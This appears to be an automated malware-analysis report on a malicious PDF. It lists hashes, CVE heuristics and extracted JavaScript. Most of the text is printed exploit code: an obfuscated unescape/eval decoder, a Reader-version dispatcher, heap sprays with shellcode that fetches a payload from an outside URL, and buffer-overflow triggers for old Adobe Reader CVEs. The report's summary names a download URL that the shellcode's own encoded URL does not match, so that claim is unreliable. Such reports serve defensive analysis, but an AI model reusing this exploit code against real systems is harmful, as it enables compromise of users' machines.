Malicious PDF — malware analysis report

Static analysis result for SHA-256 77d3d40cbb30f590…

MALICIOUS

PDF

10.6 KB
MD5: 884071243327b666e78d0229fc377336 SHA-1: df0825af27d965a3661debf92fdc3afb35fa3427 SHA-256: 77d3d40cbb30f59081d9ef3957173d49ca0fa6cc1c5b4fb85979ce12f6061919
488 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution; T1059.007 JavaScript

This PDF file contains JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URL 'http://www.nocircle.com/download.php'. The use of unescape() and eval() calls, along with variable concatenation, indicates a deliberate obfuscation technique to hide the malicious payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js
51d46c7569f3ef1dcb06fab185b78900791e2744eaef5139d3facd387c22d593
pdf-javascript-stream | PDF /JS object 7 at offset 0x233 | 46849 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 232 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Stage-1 decoder (artifact 1). FOD is built by concatenating ~240 unescape()'d
// fragment globals; the fragments are declared after this function in arbitrary
// order, and it is the concatenation order here — not the declaration order —
// that reconstructs the stage-2 source. The result is handed to the callback
// TIK; the call site (which per the report passes eval) is not in this preview.
// Each fragment is itself \u-escaped source text, e.g. ivXfm below decodes to
// "u2A64\u2F6C\u66BF\uCFAA\u1087", a run that appears verbatim inside the
// payload literals of artifact 2.
function RyI(TIK){var FOD=unescape(NZKGK)+unescape(DVlE)+unescape(xcRIU)+unescape(BGjXr)+unescape(RMAEv)+unescape(iWtm)+unescape(rdMVJ)+unescape(uccA)+unescape(mjaA)+unescape(RasS)+unescape(wmivt)+unescape(crDM)+unescape(PUbnb)+unescape(ECLm)+unescape(JoHy)+unescape(zeGNk)+unescape(YqLJM)+unescape(ZudL)+unescape(CVqj)+unescape(nCbm)+unescape(fqAh)+unescape(eQxBd)+unescape(rAwx)+unescape(BTpGt)+unescape(gcxz)+unescape(vKpDN)+unescape(XMfJ)+unescape(lQbux)+unescape(xznw)+unescape(QOEo)+unescape(EKPVp)+unescape(fsqE)+unescape(wbnC)+unescape(OiRY)+unescape(wkFzd)+unescape(KEdrI)+unescape(SPFF)+unescape(mWmtG)+unescape(QAQm)+unescape(TTort)+unescape(YVMY)+unescape(CIyc)+unescape(qsdOV)+unescape(aYnv)+unescape(pOII)+unescape(jnEm)+unescape(HaZCv)+unescape(qxEO)+unescape(YxaCk)+unescape(qAYEN)+unescape(YFwvE)+unescape(weff)+unescape(UJURs)+unescape(ZQrF)+unescape(bNskl)+unescape(KIJhD)+unescape(zLKpG)+unescape(rTin)+unescape(rLGl)+unescape(Fdpr)+unescape(HEmA)+unescape(Oxeg)+unescape(WetX)+unescape(kjidP)+unescape(IQSM)+unescape(YCnW)+unescape(UgRZy)+unescape(aOoQh)+unescape(Yucng)+unescape(fhecg)+unescape(DgRdC)+unescape(ZIed)+unescape(nSQzE)+unescape(IQgIm)+unescape(USgB)+unescape(Behf)+unescape(yqSRx)+unescape(dvZhB)+unescape(Ncpr)+unescape(FZTM)+unescape(zFKIl)+unescape(aTbQ)+unescape(GGdg)+unescape(zQyT)+unescape(JDRU)+unescape(bbEB)+unescape(mCqif)+unescape(teGMo)+unescape(zNmp)+unescape(yHwc)+unescape(SXUNl)+unescape(AEyno)+unescape(lCIL)+unescape(hxLz)+unescape(VSvD)+unescape(GOLrc)+unescape(mFck)+unescape(UQVgJ)+unescape(DuKY)+unescape(pSPb)+unescape(CABYs)+unescape(iJxf)+unescape(WcGYg)+unescape(ipkjy)+unescape(mBLGB)+unescape(ukVi)+unescape(bFCIn)+unescape(AJgk)+unescape(Hlkqw)+unescape(ZPmt)+unescape(BzFTS)+unescape(dTyD)+unescape(fOJq)+unescape(FxdC)+unescape(JchrZ)+unescape(EHfv)+unescape(Viyo)+unescape(BjhI)+unescape(XQup)+unescape(rHKtu)+unescape(OQEq)+unescape(PHMj)+unescape(hWZm)+unescape(xXWFV)+unescape(mHvN)+unescape(OYzz)+unescape(YmAC)+unescape(KzUQQ)
+unescape(BYUT)+unescape(ejxEY)+unescape(OugH)+unescape(slpge)+unescape(ivKLW)+unescape(lInDC)+unescape(FVMi)+unescape(pmtd)+unescape(uzItA)+unescape(spzR)+unescape(tIbEK)+unescape(xJkKd)+unescape(bYFU)+unescape(yzMv)+unescape(lJns)+unescape(TLEQ)+unescape(CLkDF)+unescape(dfGhD)+unescape(ffJjO)+unescape(KxZM)+unescape(jzvF)+unescape(JWac)+unescape(mdwsm)+unescape(yjUKP)+unescape(CNKf)+unescape(hXDlk)+unescape(VjAQ)+unescape(kezpL)+unescape(wToF)+unescape(rHiuB)+unescape(AkUoh)+unescape(sUNh)+unescape(hPNi)+unescape(wVABE)+unescape(IJjg)+unescape(IYLzN)+unescape(svAlp)+unescape(MXnnw)+unescape(XTDX)+unescape(VoGnv)+unescape(XeRhN)+unescape(ivXfm)+unescape(TcbyI)+unescape(iwxLF)+unescape(tPUl)+unescape(ctjQY)+unescape(lZjY)+unescape(PKxhZ)+unescape(FSOTN)+unescape(kVeqp)+unescape(ozhsb)+unescape(YrrD)+unescape(YPfxx)+unescape(WvoX)+unescape(eMiWs)+unescape(OjiP)+unescape(gNuT)+unescape(UAQH)+unescape(NASfz)+unescape(YMLVy)+unescape(Agjk)+unescape(kvnLe)+unescape(jyRj)+unescape(DQRB)+unescape(yEbPQ)+unescape(mkED)+unescape(RDwF)+unescape(BbCf)+unescape(DHCT)+unescape(UCtx)+unescape(QcMK)+unescape(NOymj)+unescape(nvbTl)+unescape(cLnQI)+unescape(SWZdI)+unescape(kHTBl)+unescape(HCfnS)+unescape(pfwYn)+unescape(TDpjY)+unescape(NsSWc)+unescape(gAUSp)+unescape(IVMmb)+unescape(PksQx)+unescape(Jkfjs)+unescape(XlOwn)+unescape(LktVJ)+unescape(pUrhn)+unescape(WWVd)+unescape(qMEm)+unescape(PEoKn)+unescape(lvVGW)+unescape(GmCL)+unescape(nhkp)+unescape(Adhgi)+unescape(OVdjQ)+unescape(UXnUd)+unescape(avcB)+unescape(rwSEl)+unescape(TCMm)+unescape(uyMk)+unescape(PeVFd)+unescape(KJAG)+unescape(BmaV)+unescape(usyNH);TIK(FOD);}
// Fragment globals (\u-escaped stage-2 source text; see RyI above).
var ivXfm='\u0075\u0032\u0041\u0036\u0034\u005c\u0075\u0032\u0046\u0036\u0043\u005c\u0075\u0036\u0036\u0042\u0046\u005c\u0075\u0043\u0046\u0041\u0041\u005c\u0075\u0031\u0030\u0038\u0037';var 
tIbEK='\u0034\u0022\u002b\u0022\u0035\u0030\u0022\u002b\u0022\u0030\u0030\u0022\u002b\u0022\u0066\u0022\u002c\u007a\u0058\u006a\u0029\u003b\u007d\u000a\u0066\u0075\u006e\u0063\u0074';var NOymj='\u0075\u0036\u0035\u0037\u0032\u005c\u0075\u0032\u0030\u0037\u0032\u005c\u0075\u
... (truncated)
unescape_var_concat_stage_000.js
16a3ec83df4720190784f15c0f950dc49b49136ee870a98de78d6f8f16bba742
deobfuscated-js | unescape variable-concat decoded JavaScript (decompressed) at offset 0x285 | 6718 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Stage-2 entry / version dispatcher (artifact 2). apF aliases unescape so the
// literal name never appears below; PNP is app.viewerVersion as a string (the
// relational operators coerce it back to a number). qbx = unescape("t\h\i\s")
// -> "this", and eval("this") yields the document object, but qbx is not used
// again in the visible preview.
// Branches: PNP<8 -> DUDfO() (Collab.collectEmailInfo, CVE-2007-5659 per the
// heuristics); 8<=PNP<9 -> uXQ() (util.printf, CVE-2008-2992 per the heuristics).
var apF=unescape,PNP=app.viewerVersion.toString(),qbx=apF("t\h\i\s");qbx=eval(qbx);if(PNP<8)
{DUDfO();}
if(PNP>=8&&PNP<9)
{uXQ();}
// NOTE: the guards overlap — PNP<=9 also holds for every version that already
// took one of the two branches above, so iZYrq() runs in addition to
// DUDfO()/uXQ(), and alone on 9.x. iZYrq is defined further down the script,
// outside this preview (presumably the Collab.getIcon branch the heuristics
// report — confirm against the full artifact).
if(PNP<=9)
{iZYrq();}
// Pads nmNwB by repeated self-doubling until nmNwB.length*2 >= oDUUJ, then
// returns its first oDUUJ/2 characters. oDUUJ is treated as a byte count (one
// UTF-16 code unit = 2 bytes; see the length*2 arithmetic in DUDfO), so the
// result is oDUUJ bytes wide. Used to build the "\u9090" sled in DUDfO(); hdQ()
// inside uXQ() is the same helper with a different name. Never terminates if
// nmNwB is empty and oDUUJ is positive.
function sWRuF(nmNwB,oDUUJ){while(nmNwB.length*2<oDUUJ){nmNwB+=nmNwB;}
return nmNwB.substring(0,oDUUJ/2);}
// Reader < 8 branch. AzczU is a UTF-16-escaped payload blob (the report calls
// it shellcode). Its tail (\u7468\u7074\u2F3A ... = "ht","tp",":/" ...) is plain
// little-endian ASCII holding an http URL followed by a "<browser>|<OS>" style
// query string ending in "=2" (\u323D).
// NOTE(review): decode that tail and confirm it matches the URL quoted in the
// summary at the top of the report — a first read of the pairs does not
// obviously yield that host/path.
// Spray layout: XsxZg holds blocks of bNLoN (0x400000) bytes, each one a
// "\u9090" sled (via sWRuF) followed by AzczU, sized so sled+payload+0x38
// bytes fill the block. BPCzm = (0x0c0c0c0c-0x400000)/0x400000 ≈ 47.2, so the
// loop builds 48 blocks up to the target address fKmJw (0x0c0c0c0c).
function DUDfO(){var AzczU=apF("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u772F\u6E6F\u6369\u7265\u632E\u2F6E\u6F6C\u6461\u702E\u7068\u613F\u613D\u7326\u3D74\u6E49\u6574\u6E72\u7465\u4520\u7078\u6F6C\u6572\u2072\u2E37\u7C30\u6957\u646E\u776F\u2073\u5058\u6526\u323D");var fKmJw=0x0c0c0c0c;var XsxZg=[];var bNLoN=0x400000;var BIhkO=AzczU.length*2;var oDUUJ=bNLoN-(BIhkO+0x38);var nmNwB=apF("\u9090\u9090");nmNwB=sWRuF(nmNwB,oDUUJ);var BPCzm=(fKmJw-0x400000)/bNLoN;for(var CSBLZ=0;CSBLZ<BPCzm;CSBLZ++){XsxZg[CSBLZ]=nmNwB+AzczU;}
// Trigger: a "\u0c0c" string doubled past 44952 code units is passed as the
// msg field of Collab.collectEmailInfo (CVE-2007-5659 per the heuristics); the
// 0x0c0c fill presumably steers control into the 0x0c0c0c0c spray above. The
// return value is stored on the document as this.collabStore.
var qgiiC=apF("\u0c0c\u0c0c");while(qgiiC.length<44952)qgiiC+=qgiiC;this.collabStore=Collab.collectEmailInfo({subj:"",msg:qgiiC});}
// Reader 8.x branch. Same spray construction as DUDfO() — hdQ() is a renamed
// copy of sWRuF() — but with target address nSd = 0x30303030, so
// tfH = (0x30303030-0x400000)/0x400000 ≈ 191.7 and the loop builds 192 blocks
// in bJB. LTN is the same payload blob as AzczU except for the final pair
// (\u313D here vs \u323D there, i.e. "=1" vs "=2" at the end of the trailing
// query string). nSd and LTN are assigned without var and so become globals.
function uXQ(){var bJB=new Array();function hdQ(mFR,Mza){while(mFR.length*2<Mza){mFR+=mFR;}
mFR=mFR.substring(0,Mza/2);return mFR;}
nSd=0x30303030;LTN=apF("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u772F\u6E6F\u6369\u7265\u632E\u2F6E\u6F6C\u6461\u702E\u7068\u613F\u613D\u7326\u3D74\u6E49\u6574\u6E72\u7465\u4520\u7078\u6F6C\u6572\u2072\u2E37\u7C30\u6957\u646E\u776F\u2073\u5058\u6526\u313D");var oJB=0x400000;var Kpj=LTN.length*2;var Mza=oJB-(Kpj+0x38);var mFR=apF("\u9090\u9090");mFR=hdQ(mFR,Mza);var tfH=(nSd-0x400000)/oJB;for(var vbN=0;vbN<tfH;vbN++){bJB[vbN]=mFR+LTN;}
// Trigger: zXj = a 20-digit string plus 138*2 = 276 trailing "8"s (296 chars),
// then util.printf with the format "%4"+"50"+"00"+"f" = "%45000f"
// (CVE-2008-2992 per the heuristics); the split literal presumably exists to
// dodge naive "%...f" keyword matching. Note the loop counter reuses apF, so
// the global unescape alias is a number (276) once this function has run.
var zXj="53624187044189210578";for(apF=0;apF<138*2;apF++){zXj+="8";}
util.printf("%4"+"50"+"00"+"f",zXj);}
function gKY(DtU)
{DtU=DtU.replace(/[\+1]/g,"0");DtU=DtU.replace(/[\+2]
... (truncated)